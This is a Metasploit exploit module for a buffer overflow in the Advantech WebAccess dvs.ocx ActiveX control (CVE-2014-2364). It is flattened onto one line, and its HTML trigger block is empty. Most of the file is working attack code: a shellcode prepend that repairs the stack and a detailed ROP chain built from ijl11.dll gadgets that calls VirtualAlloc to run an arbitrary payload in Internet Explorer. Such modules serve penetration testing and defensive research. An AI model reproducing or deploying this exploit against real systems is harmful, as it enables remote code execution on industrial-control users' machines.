## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info = {}) super(update_info(info, 'Name' => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow vulnerability in Advantec WebAccess. The vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to sprintf can be reached with user controlled data through the GetColor function. This module has been tested successfully on Windows XP SP3 with IE6 and Windows 7 SP1 with IE8 and IE 9. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ ['CVE', '2014-2364'], ['ZDI', '14-255'], ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02'] ], 'DefaultOptions' => { 'Retries' => false, 'InitialAutoRunScript' => 'migrate -f' }, 'BrowserRequirements' => { :source => /script|headers/i, :os_name => Msf::OperatingSystems::WINDOWS, :ua_name => /MSIE/i, :ua_ver => lambda { |ver| Gem::Version.new(ver) < Gem::Version.new('10') }, :clsid => "{5CE92A27-9F6A-11D2-9D3D-000001155641}", :method => "GetColor" }, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'BadChars' => "\x00\x0a\x0d\x5c", # Patch the stack to execute the decoder... 'PrependEncoder' => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100 # Fix the stack again, this time better :), before the payload # is executed. 'Prepend' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18] "\x83\xC0\x08" + # add eax, byte 8 "\x8b\x20" + # mov esp, [eax] "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 }, 'Platform' => 'win', 'Arch' => ARCH_X86, 'Targets' => [ [ 'Automatic', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 17 2014')) end def on_request_exploit(cli, request, target_info) print_status("Requested: #{request.uri}") content = <<-EOS EOS print_status("Sending #{self.name}") send_response_html(cli, content, {'Pragma' => 'no-cache'}) end # Uses gadgets from ijl11.dll 1.1.2.16 def rop_payload(code) xpl = rand_text_alphanumeric(61) # offset xpl << [0x60014185].pack("V") # RET xpl << rand_text_alphanumeric(8) # EBX = dwSize (0x40) xpl << [0x60012288].pack("V") # POP ECX # RETN xpl << [0xffffffff].pack("V") # ecx value xpl << [0x6002157e].pack("V") # POP EAX # RETN xpl << [0x9ffdafc9].pack("V") # eax value xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10 xpl << [0x60018084].pack("V") # POP EBP # RETN xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << [0x60029f6c].pack("V") # .data ijl11.dll xpl << [0x60012288].pack("V") # POP ECX # RETN xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN) xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret # EDX = flAllocationType (0x1000) xpl << [0x60012288].pack("V") # POP ECX # RETN xpl << [0xffffffff].pack("V") # ecx value xpl << [0x6002157e].pack("V") # POP EAX # RETN xpl << [0x9ffdbf89].pack("V") # eax value xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10 # ECX = flProtect (0x40) xpl << [0x6002157e].pack("V") # POP EAX # RETN xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << [0x60029f6c].pack("V") # .data ijl11.dll xpl << [0x60012288].pack("V") # POP ECX # RETN xpl << [0xffffffff].pack("V") # ecx value 0x41.times do xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN end # EAX = ptr to &VirtualAlloc() xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll] xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll] # EBP = POP (skip 4 bytes) xpl << [0x6002054b].pack("V") # POP EBP # RETN xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn) # ESI = ptr to JMP [EAX] xpl << [0x600181cc].pack("V") # POP ESI # RETN xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax]) # EDI = ROP NOP (RETN) xpl << [0x60021ad1].pack("V") # POP EDI # RETN xpl << [0x60021ad2].pack("V") # ptr to &(retn) # ESP = lpAddress (automatic) # PUSHAD # RETN xpl << [0x60018399].pack("V") # PUSHAD # RETN xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn) xpl << code xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping xpl end end